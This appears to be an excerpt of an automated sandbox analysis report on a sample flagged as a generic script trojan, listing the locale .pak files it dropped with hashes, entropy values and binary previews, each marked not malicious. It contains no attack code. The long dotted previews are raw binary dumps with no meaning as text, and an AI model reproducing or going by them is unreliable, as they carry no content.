                                                                    Preview:..........s.h.....i.....j.....k.....l.*...n.2...o.7...p.D...r.J...s.[...t.d...v.y...w.....y.....z.....|.....}.........................................................................+.....;.....M....._.....h.....u...............................................G.....].....{.....................................................1.....@.....F.....M.....^.....p.................................................................0.....E.....[.....t.................................................................+.....6.....H.........................................".....(.....4.....@.....P.....u.....x.........................................................................................].......................A.....^.....z...............................................!.....G.....b.............................,.....3.....=.....J.....g.....q... .y...".....%.....(.....*.....+.....,.......(.../.?...0.I...1.....3.....4.....5.....6.....7. ...8.6...9.L...<.^...=.h...>.}...?.....@.....A.....C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\da.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):380107
                                                                    Entropy (8bit):5.46366244634788
                                                                    Encrypted:false
                                                                    SSDEEP:6144:czP4qlrn8+ua0swlGVJJwoXlw5CvET5VTrBGzO7iJyd4tTWwT:dqlr89JklwH55rETL
                                                                    MD5:E7BA94C827C2B04E925A76CB5BDD262C
                                                                    SHA1:ABBA6C7FCEC8B6C396A6374331993C8502C80F91
                                                                    SHA-256:D8DA7AB28992C8299484BC116641E19B448C20ADF6A8B187383E2DBA5CD29A0B
                                                                    SHA-512:1F44FCE789CF41FD62F4D387B7B8C9D80F1E391EDD2C8C901714DD0A6E3AF32266E9D3C915C15AD47C95ECE4C7D627AA7339F33EEA838D1AF9901E48EDB0187E
                                                                    Malicious:false
                                                                    Preview:..........H.h.R...i.c...j.o...k.~...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...................'...../.....7.....>.....E.....L.....M.....N.....P.....y...........................................................+.....-.....1.....Y.....n.................................................................-.....3.....;.....K.....o.......................................................................,.....C.....Y.....s.............................................................................?.....H.....i................................................................. .....+.....?.....Q.....e.....l.....o.....p.....w.........................................S.....W.................................................................".....?.....V...............................................".....5.....?... .C...".K...%.f...(.....*.....+.....,.........../.....0.....1.9...3.E...4._...5.w...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.(...A._...C.|...D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\de.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):406584
                                                                    Entropy (8bit):5.519300999448185
                                                                    Encrypted:false
                                                                    SSDEEP:6144:V3JEmQ1hqVK+6aU8WUmzg3ELWzhqY305QgfXlIsCJd:V5t6sKXaK/LWy5POsCJd
                                                                    MD5:CF22EC11A33BE744A61F7DE1A1E4514F
                                                                    SHA1:73E84848C6D9F1A2ABE62020EB8C6797E4C49B36
                                                                    SHA-256:7CC213E2C9A2D2E2E463083DD030B86DA6BBA545D5CEE4C04DF8F80F9A01A641
                                                                    SHA-512:C10C8446E3041D7C0195DA184A53CFBD58288C06EAF8885546D2D188B59667C270D647FA7259F5CE140EC6400031A7FC060D0F2348AB627485E2207569154495
                                                                    Malicious:false
                                                                    Preview:........S...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.+...y.1...z.@...|.F...}.X.....`.....e.....m.....u.....}............................................................................./.....7.....@.....f.....|.....~.....................................................%.....M.....a.....o...............................................8.....L.....S.....^.....v.....................................................6....._.......................................................................7.....H.....a.....r...............................................".....5.....K....._.....x.................................................................?.............................#.....M.....x...........................................................(.....F.....j............................................. .....".....%.1...(.N...*.q...+.t...,.........../.....0.....1.....3.....4.....5.7...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.....A.>...C.]...D.g.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\el.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):729549
                                                                    Entropy (8bit):4.799528683257041
                                                                    Encrypted:false
                                                                    SSDEEP:12288:AQbueXYquNw2202pgtZBAujt4NIbsJvaP5A3HRsgQiEYQ3C1gf2ns4CfFnx1Xu2v:B2quNw2202pgtHAujmNrJvaRA3HRsDik
                                                                    MD5:E66A75680F21CE281995F37099045714
                                                                    SHA1:D553E80658EE1EEA5B0912DB1ECC4E27B0ED4790
                                                                    SHA-256:21D1D273124648A435674C7877A98110D997CF6992469C431FE502BBCC02641F
                                                                    SHA-512:D3757529DD85EF7989D9D4CECF3F7D87C9EB4BEDA965D8E2C87EE23B8BAAEC3FDFF41FD53BA839215A37404B17B8FE2586B123557F09D201B13C7736C736B096
                                                                    Malicious:false
                                                                    Preview:..........U.h.8...i.@...j.J...k.Y...l.d...n.l...o.q...p.~...r.....s.....t.....v.....w.....y.....z.....|.....}........................................... .....'.....(.....).....+.............................&.....O.....~.........................................9.....g.............................1.....H.............................<.....T.....b......................./.....h.....p.........................................+.....].......................t.................................../.....T.....m.......................:.....].....n.................>.........................................".....E.....h.............................#.....&.....'.....C.....].....o.................4...........X.....h...........>.....x.................7.....P.....d.....w......................./.....................................................V.....k... .~...".....%.....(.....*.s...+.v...,.........../.....0.3...1.....3.....4.!...5._...6.....7.....8.=...9.\...;.....<.....=.....>.....?.....@.>...A.~...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\en-GB.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):331921
                                                                    Entropy (8bit):5.529632303060999
                                                                    Encrypted:false
                                                                    SSDEEP:6144:k6QL0f35ubiwMP9egutWbfaYX2YBB5HXSdBruC:6LduwMetW92M53SuC
                                                                    MD5:825ED4C70C942939FFB94E77A4593903
                                                                    SHA1:7A3FAEE9BF4C915B0F116CB90CEC961DDA770468
                                                                    SHA-256:E11E8DB78AE12F8D735632BA9FD078EC66C83529CB1FD86A31AB401F6F833C16
                                                                    SHA-512:41325BEC22AF2E5EF8E9B26C48F2DFC95763A249CCB00E608B7096EC6236AB9A955DE7E2340FD9379D09AC2234AEE69AED2A24FE49382FFD48742D72A929C56A
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....n.....o.#...p.0...r.6...s.G...t.P...v.e...w.r...y.x...z.....|.....}.....................................................................................$.....4.....;.....D.....[.....c.....m.......................................................................&.....A.....S.....b.....|.......................................................................(.....,...../.....5.....E.....T.....b.....{.............................................................................$.....S.....].....i.................................................................0.....@.....P.....e.....z.............................................................................A.....H.....x.............................................................................@.....U.....l............................................. .....".....%.....(.....*.6...+.9...,.W.....h.../.v...0.....1.....3.....4.....5.....6.....7.....8.C...9.P...;.a...<.i...=.t...>.....?.....@.....A...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\en-US.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):334693
                                                                    Entropy (8bit):5.521172766448584
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Mvneu710gxhmrunGeuMP9eczCPMfaYbg3In5N+Sqn8BcwS:Ml0gxvNuMbCPmgA5YSNcwS
                                                                    MD5:19D18F8181A4201D542C7195B1E9FF81
                                                                    SHA1:7DEBD3CF27BBE200C6A90B34ADACB7394CB5929C
                                                                    SHA-256:1D20E626444759C2B72AA6E998F14A032408D2B32F957C12EC3ABD52831338FB
                                                                    SHA-512:AF07E1B08BBF2DD032A5A51A88EE2923650955873753629A086CAD3B1600CE66CA7F9ED31B8CA901C126C10216877B24E123144BB0048F2A1E7757719AAE73F2
                                                                    Malicious:false
                                                                    Preview:........&...h.>...i.F...j.R...k.a...l.l...n.t...o.y...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................!.....(...../.....0.....1.....6.....^.....k.....z................................................................. .....0.....G.....K.....V.....f.....m.....y.................................................................C.....V.....Z.....b.....n.....{.............................................................................$.....+.....1.....:.....E.....b.....i.....x.........................................3.....<.....E.....O.....].....p.....s...............................................................................................@.....m...........................................................%.....*...........>.....X.....q.....................................................&......... .2...".;...%.[...(.r...*.....+.....,.........../.....0.....1.....3.....4.)...5.@...6.r...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.!.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\es-419.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):404903
                                                                    Entropy (8bit):5.392122812912978
                                                                    Encrypted:false
                                                                    SSDEEP:3072:75rkwZKG5KJo0ZyFPK9zj4rMY4rjyujd8pyPWncpwwfNEOv553l50GLFddhRIHKj:t1K2YZIK9BYgapFGl5dLFddA7Fcp
                                                                    MD5:7DA3E8AA47BA35D014E1D2A32982A5BB
                                                                    SHA1:8E35320B16305AD9F16CB0F4C881A89818CD75BB
                                                                    SHA-256:7F85673CF80D1E80ACFC94FB7568A8C63DE79A13A1BB6B9D825B7E9F338EF17C
                                                                    SHA-512:1FCA90888EB067972BCCF74DD5D09BB3FCE2CEB153589495088D5056ED4BDEDE15D54318AF013C2460F0E8B5B1A5C6484ADF0ED84F4B0B3C93130B086DA5C3BF
                                                                    Malicious:false
                                                                    Preview:..........=.h.h...i.q...j.}...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}. .....(.....-.....5.....=.....E.....L.....S.....Z.....[.....\.....^...........................................................'.....>.....@.....D.....p...........................................................(.....H.....b.....g.....o.........................................#.....9.....N.....T.....W.....].....t...................................@.....P.....V.....^.....e.....x...............................................&.....2.....a.................................................................1.....I....._.....f.....i.....j.....s.....|.............................0.....t.....|.......................3.....B.....\.....m.....x.........................................*.....I............................................. .....".....%.(...(.A...*.]...+.`...,.~........./.....0.....1.....3.....4.3...5.V...6.....7.....8.....9.....;.....<.....=.....>.!...?.+...@.@...A.s...C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\es.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):404348
                                                                    Entropy (8bit):5.362527979144936
                                                                    Encrypted:false
                                                                    SSDEEP:6144:/Q0DA42b4XUx+SCHgfUcp9Ch48BKjbu5mrj7o2oxjm6PZqJ:YK2b40P9pchXgjbu5mrroNSJ
                                                                    MD5:04A9BA7316DC81766098E238A667DE87
                                                                    SHA1:24D7EB4388ECDFECADA59C6A791C754181D114DE
                                                                    SHA-256:7FA148369C64BC59C2832D617357879B095357FE970BAB9E0042175C9BA7CB03
                                                                    SHA-512:650856B6187DF41A50F9BED29681C19B4502DE6AF8177B47BAD0BF12E86A25E92AA728311310C28041A18E4D9F48EF66D5AD5D977B6662C44B49BFD1DA84522B
                                                                    Malicious:false
                                                                    Preview:..........J.h.N...i.V...j.b...k.q...l.|...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................".....*.....1.....8.....?.....@.....A.....C.....r...........................................................2.....4.....8.....`.................................................................:.....T.....Y.....a.....s...............................................&.....,...../.....5.....L.....k............................. .....0.....6.....>.....E.....X.....e.....v...............................................F.....m.....x.................................................................B.....I.....L.....M.....V....._.....h.....o.......................k.....s.......................).....8.....R.....c.....n.....z.........................................2.....f....................................... .....".....%.....(.!...*.@...+.C...,.a.....{.../.....0.....1.....3.....4.....5."...6.n...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.B...C.i...D.s.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\et.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):365447
                                                                    Entropy (8bit):5.471951090286899
                                                                    Encrypted:false
                                                                    SSDEEP:6144:U/RGRpph+2n4x6i05L9H4h+JbT/R/WiMMn5bjN43qcLQ6PQX:8R6pHnpcmzn5bjh
                                                                    MD5:CCC71F88984A7788C8D01ADD2252D019
                                                                    SHA1:6A87752EAC3044792A93599428F31D25DEBEA369
                                                                    SHA-256:D69489A723B304E305CB1767E6C8DA5D5D1D237E50F6DDC76E941DCB01684944
                                                                    SHA-512:D35CCD639F2C199862E178A9FAB768D7DB10D5A654BC3BC1FAB45D00CEB35A01119A5B4D199E2DB3C3576F512B108F4A1DF7FAF6624D961C0FC4BCA5AF5F0E07
                                                                    Malicious:false
                                                                    Preview:..........8.h.r...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|. ...}.2.....:.....?.....G.....O.....W.....^.....e.....l.....m.....n.....p.....................................................+.....b.....x.....z.....~.....................................................3.....C.....U.....k.....x.....~................................................................. .....#.....*.....>.....Q.....c.....|.................................................................(.....3.....?.....f.....s.....................................................1.....4.....D.....T.....c.....x.......................................................................S...................................5.....A.....L.....P.....Z....._.....b.....r...................................3.....M.....R.....Z.....l............... .....".....%.....(.....*.....+.....,.<.....V.../.n...0.{...1.....3.....4.....5.....6.....7.5...8.N...9.a...;.t...<.....=.....>.....?.....@.....A.....C.....D.%.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\fa.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):591476
                                                                    Entropy (8bit):5.080621083768775
                                                                    Encrypted:false
                                                                    SSDEEP:12288:HniDys0XVX9nuyaXTfwIDwNUWGOGfStQvjy1feKtDmrwMTAKzIxRAQiHedNu36Xp:HneM3uyaXTfwewNUWGOGfStQvjy1feKn
                                                                    MD5:2E37FD4E23A1707A1ECCEA3264508DFF
                                                                    SHA1:E00E58ED06584B19B18E9D28B1D52DBFC36D70F3
                                                                    SHA-256:B9EE861E1BDECFFE6A197067905279EA77C180844A793F882C42F2B70541E25E
                                                                    SHA-512:7C467F434EB0CE8E4A851761AE9BD7A9E292AAB48E8E653E996F8CA598D0EB5E07EC34E2B23E544F3B38439DC3B8E3F7A0DFD6A8E28169AA95CEFF42BF534366
                                                                    Malicious:false
                                                                    Preview:........^...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.;...y.A...z.P...|.V...}.h.....p.....u.....}...........................................................'.....Q.....`.....i...................................".....*.....R.....u.........................................Q.....y.........................................(...........................................................K.....l.......................,....._.....z..........................................................._.....v.............................K.....g.....v.........................................(.....I.....a.....~.....................................................F........... .....3.......................*.....B.....c.....k.....~...................................X.....~.................#.....-.....3.....M.....{......... .....".....%.....(.....*.\...+._...,.}........./.....0.....1.....3.....4._...5.....6.....7.)...8.b...9.{...;.....<.....=.....>.....?.....@.....A.E...C.....D.....E...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\fi.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):374471
                                                                    Entropy (8bit):5.4357475905490436
                                                                    Encrypted:false
                                                                    SSDEEP:6144:sMeOXrZx5SkDbhCwx+sk/bOE/BanTLLE5lJucHcEJ18OWUczfSUWcX1wR2:snAr15wRBaA5lJxHcEJ18OWUII2
                                                                    MD5:21E534869B90411B4F9EA9120FFB71C8
                                                                    SHA1:CC91FFBD19157189E44172392B2752C5F73984C5
                                                                    SHA-256:2D337924139FFE77804D2742EDA8E58D4E548E65349F827840368E43D567810B
                                                                    SHA-512:3CA3C0ADAF743F92277452B7BD82DB4CF3F347DE5568A20379D8C9364FF122713BEFD547FBD3096505EC293AE6771ADA4CD3DADAC93CC686129B9E5AACF363BD
                                                                    Malicious:false
                                                                    Preview:........k...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.0...t.9...v.N...w.[...y.a...z.p...|.v...}...........................................................................................)...../.....8.....U.....\.....l.........................................".....'.....5.....?.....N.....Z........................................................... .....-.....5.....<.....N.....f.....j.....t.....z.........................................7.....A.....F.....N.....U.....a.....n.....{.............................................../.....Q.....Y.....i.....u......................................................................................... .....'.....6.............................b.....t...........................................................(.....D.....f.....}................................................... .....".2...%.^...(.{...*.....+.....,.........../.....0.....1.:...3.H...4.d...5.~...6.....7.....8.....9.....;.0...<.@...=.L...>.b...?.k...@.....A.....C.....D.....E...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\fil.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):419886
                                                                    Entropy (8bit):5.213443304857257
                                                                    Encrypted:false
                                                                    SSDEEP:6144:BnI+f5Qm2xaVyEDQftIK9bSNxeFXGvZ3Omy5GzmHYFAk1s8:C+f541e+b4xy5ym8
                                                                    MD5:D7DF2EA381F37D6C92E4F18290C6FFE0
                                                                    SHA1:7CACF08455AA7D68259FCBA647EE3D9AE4C7C5E4
                                                                    SHA-256:DB4A63FA0D5B2BABA71D4BA0923CAED540099DB6B1D024A0D48C3BE10C9EED5A
                                                                    SHA-512:96FC028455F1CEA067B3A3DD99D88A19A271144D73DFF352A3E08B57338E513500925787F33495CD744FE4122DFF2D2EE56E60932FC02E04FEED2EC1E0C3533F
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.-...l.8...n.@...o.E...p.R...r.X...s.i...t.r...v.....w.....y.....z.....|.....}.........................................................................).....6.....K.....a.....h.....q.....................................................'.....D.....J.....[.....q.....{...............................................#.....5.....N.....d...........................................................$.....8.....Q.....v.................................................................,.....7.....W.........................................4.....D.....R.....`.....u...............................................-.....4.....7.....8.....B.....L.....V.....a.....j.....{.................T.....\........................................."...../.....9.....?.....X.....~.............................C.....b.....i.....t..................... .....".....%.....(.....*.5...+.8...,.V.....n.../.....0.....1.....3.....4.....5.....6.I...7._...8.{...9.....;.....<.....=.....>.....?.....@.....A.*.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\fr.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):436450
                                                                    Entropy (8bit):5.4004782148030905
                                                                    Encrypted:false
                                                                    SSDEEP:12288:LKi1uIt6QuagV1ZzosmZ7MYnYV1S3Bb5MxlqE0wC5wZLljHnkH0oR5FEu64JGV7h:qVVQ515CF
                                                                    MD5:3EE48A860ECF45BAFA63C9284DFD63E2
                                                                    SHA1:1CB51D14964F4DCED8DEA883BF9C4B84A78F8EB6
                                                                    SHA-256:1923E0EDF1EF6935A4A718E3E2FC9A0A541EA0B4F3B27553802308F9FD4FC807
                                                                    SHA-512:EB6105FACA13C191FEF0C51C651A406B1DA66326BB5705615770135D834E58DEE9BED82AA36F2DFB0FE020E695C192C224EC76BB5C21A1C716E5F26DFE02F763
                                                                    Malicious:false
                                                                    Preview:.........._.h.$...i.5...j.A...k.P...l.[...n.c...o.h...p.u...r.{...s.....t.....v.....w.....y.....z.....|.....}............................................................. .....".....G.....W.....e.....w...........................................................+.....>.....\.....c.....q.........................................#.....?.....A.....T.....h.....t...........................................................+.....=.....N.....r...........................................................(.....G.....O....._.........................................H.....Z.....d.....q.....................................................!.....(.....+.....,.....4.....<.....E.....L....._.................#.....*.....j...........................................................#.....H.....d.......................2.....I.....P.....Y.....j............... .....".....%.....(.....*.....+.....,.-.....D.../.i...0.w...1.....3.....4.....5.....6.Q...7.b...8.z...9.....;.....<.....=.....>.....?.....@.....A.G...C.n...D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\gu.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):832533
                                                                    Entropy (8bit):4.370164270379204
                                                                    Encrypted:false
                                                                    SSDEEP:3072:RqlNvTn1Pdm06M0ITsKMaWZKerbtsMhmksd4Mqz2sQmB51jvjsWnhAgfZw/g/I/f:RuN7n1VQFLFwsL5cqhgrA8
                                                                    MD5:308619D65B677D99F48B74CCFE060567
                                                                    SHA1:9F834DF93FD48F4FB4CA30C4058E23288CF7D35E
                                                                    SHA-256:E40EE4F24839F9E20B48D057BF3216BC58542C2E27CB40B9D2F3F8A1EA5BFBB4
                                                                    SHA-512:3CA84AD71F00B9F7CC61F3906C51B263F18453FCE11EC6C7F9EDFE2C7D215E3550C336E892BD240A68A6815AF599CC20D60203294F14ADB133145CA01FE4608F
                                                                    Malicious:false
                                                                    Preview:..........T.h.:...i.T...j.`...k.o...l.z...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}......................... .....(...../.....6.....=.....>.....?.....D.......................0.....E.....[.......................+.....c.....e.....q.......................8.....p...................................Q...................................<.....X.................%.....>.....c...................................*.....U.......................w...............................................g.....v.......................Q.................D.............................%.....O.....R.....r.............................+.....2.....5.....7.....P.....i.......................H...........\.....~...........S.................%.....E.....N.....o.....{.......................O.................;.......................*.....M.....o......... .....".....%.....(.Y...*.....+.....,.........../.1...0.Y...1.....3.....4.....5.;...6.....7.....8.,...9.T...;.....<.....=.....>.....?.....@.0...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\he.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):519468
                                                                    Entropy (8bit):4.6902065244805256
                                                                    Encrypted:false
                                                                    SSDEEP:12288:iDIJk5rUp/mTLa2/ANNqOL607Af6XVjeQCapb1527oFpMbe54lmdADnwg5Qgx:7205KoM
                                                                    MD5:FC84EA7DC7B9408D1EEA11BEEB72B296
                                                                    SHA1:DE9118194952C2D9F614F8E0868FB273DDFAC255
                                                                    SHA-256:15951767DAFA7BDBEDAC803D842686820DE9C6DF478416F34C476209B19D2D8C
                                                                    SHA-512:49D13976DDDB6A58C6FDCD9588E243D705D99DC1325C1D9E411A1D68D8EE47314DFCB661D36E2C4963C249A1542F95715F658427810AFCABDF9253AA27EB3B24
                                                                    Malicious:false
                                                                    Preview:........|.|.h.....i.....j.....k.....l.!...n.)...o.....p.;...r.A...s.R...t.[...v.p...w.}...y.....z.....|.....}.........................................................................8.....O.....h............................................... .....".....&.....N.....j.........................................B.....[.....p...............................................G.....o.....w...............................................).....E.....y.............................$.....,.....3.....?.....V.....r...................................!.....D.....h...................................7.....W.....Z.....m............................................................................./.................e.....o.......................E.....X.....p.....v.........................................@.....Z...................................#.....J.....U... .g...".....%.....(.....*.....+.....,.......#.../.C...0.P...1.....3.....4.....5.....6.9...7.R...8.g...9.{...;.....<.....=.....>.....?.....@.....A.x...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\hi.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):868673
                                                                    Entropy (8bit):4.359937106090665
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FugBVdK+X9c+XdfdkhSvf4QAEm5dmGrsUt3GR3GXO7NLdYnLsBPtv83ctKOf4z8d:cuVAsc+NZB5/5MNSD
                                                                    MD5:B5DFCE8E3BA0AEC2721CC1692B0AD698
                                                                    SHA1:C5D6FA21A9BA3D526F3E998E3F627AFB8D1EECF3
                                                                    SHA-256:B1C7FB6909C8A416B513D6DE21EEA0B5A6B13C7F0A94CABD0D9154B5834A5E8B
                                                                    SHA-512:FACF0A9B81AF6BB35D0FC5E69809D5C986A2C91A166E507784BDAD115644B96697FE504B8D70D9BBB06F0C558F746C085D37E385EEF41F0A1C29729D3D97980F
                                                                    Malicious:false
                                                                    Preview:........y...h.....i.....j.....k.....l.....n.#...o.(...p.5...r.;...s.L...t.U...v.j...w.w...y.}...z.....|.....}.........................................................................t...................................A.....d.....~.............................4.....c...................................d.......................l...................................J........... .....9.....H.....p...................................P.......................g.........................................+.....K.......................P.....u.......................l.......................9.....b...................................C.....m...............................................#.....D.................&.....<.................N.................................../.....A.....s...........................................................*.....R.....q... .....".....%.....(.6...*.s...+.v...,.........../.....0.5...1.....3.....4.....5.@...6.....7.....8.:...9._...;.....<.....=.....>.....?.....@.8...A.|...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\hr.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):406671
                                                                    Entropy (8bit):5.521226257186607
                                                                    Encrypted:false
                                                                    SSDEEP:3072:z9mYpq0ZkIEZgVRTJ3MOS+WG0uPXbG4TT6WI6DkYAiKbeM/wXbnWNjdmvW0IEifp:zTEgNmW/5tE7IDjG
                                                                    MD5:255F808210DBF995446D10FF436E0946
                                                                    SHA1:1785D3293595F0B13648FB28AEC6936C48EA3111
                                                                    SHA-256:4DF972B7F6D81AA7BDC39E2441310A37F746AE5015146B4E434A878D1244375B
                                                                    SHA-512:8B1A4D487B0782055717B718D58CD21E815B874E2686CDFD2087876B70AE75F9182F783C70BF747CF4CA17A3AFC68517A9DB4C99449FA09BEF658B5E68087F2A
                                                                    Malicious:false
                                                                    Preview:..........<.h.j...i.{...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.*.....2.....7.....?.....G.....O.....V.....].....d.....e.....f.....h...........................................................:.....K.....M.....Q.....y...........................................................-.....D.....T.....Z.....b.....p.......................................................................&.....8.....H.....].....z...........................................................&.....1.....H.....................................................'.....2.....F.....g.....j.....z...................................................................................`.......................;.....W.....p.....................................................6.....N............................................... .....B.....M... .W...".h...%.....(.....*.....+.....,.........../.....0.....1.O...3.a...4.~...5.....6.....7.....8.....9.0...;.>...<.K...=.W...>.l...?.u...@.....A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\hu.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):437458
                                                                    Entropy (8bit):5.655020135928055
                                                                    Encrypted:false
                                                                    SSDEEP:6144:wxEAuskhSSfm4Cky1tV5z8iZfGRzEY63aQSam7gXOeeeQi5gR7azQtGV52n5ydpS:wxLaj6V5z850+7BwQi5Rn6Z
                                                                    MD5:2AA0A175DF21583A68176742400C6508
                                                                    SHA1:3C25BA31C2B698E0C88E7D01B2CC241F0916E79A
                                                                    SHA-256:B59F932DF822AB1A87E8AAB4BBB7C549DB15899F259F4C50AE28F8D8C7CE1E72
                                                                    SHA-512:03A16FEB0601407E96BCB43AF9BDB21E5218C2700C9F3CFD5F9690D0B4528F9DC17E4CC690D8C9132D4E0B26D7FAAFD90AA3F5E57237E06FB81AAB7AB77F6C03
                                                                    Malicious:false
                                                                    Preview:..........j.h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...r.c...s.t...t.}...v.....w.....y.....z.....|.....}.........................................................................L.....\.....r...............................................,...........2.....Z.....y.....................................................-.....X.....p.....u.....{.........................................!.....9.....X.....\....._.....m...................................@.....c.................................................................7.....B.....Z.....h.....................................................,.....A.....[.....{.................................................................q...........5.....;...................................#.....+.....9.....A.....G.....^.............................>.....u....................................... .....".....%.5...(.R...*.x...+.{...,.........../.....0.....1.....3.....4.6...5.X...6.....7.....8.....9.....;.....<.....=.....>.(...?.5...@.H...A.p...C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\id.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):359190
                                                                    Entropy (8bit):5.384547702191974
                                                                    Encrypted:false
                                                                    SSDEEP:6144:UINLZJl/dv1DR9S2fjDVnjHFfRmP2x1r856Rh1vtTtSLsEar:Nf7PDuAVnjHFpm+xh856RhP
                                                                    MD5:B6FCD5160A3A1AE1F65B0540347A13F2
                                                                    SHA1:4CF37346318EFB67908BBA7380DBAD30229C4D3D
                                                                    SHA-256:7FD715914E3B0CF2048D4429F3236E0660D5BD5E61623C8FEF9B8E474C2AC313
                                                                    SHA-512:A8B4A96E8F9A528B2DF3BD1251B72AB14FECCF491DD254A7C6ECBA831DFABA328ADB0FD0B4ACDDB89584F58F94B123E97CAA420F9D7B34131CC51BDBDBF3ED73
                                                                    Malicious:false
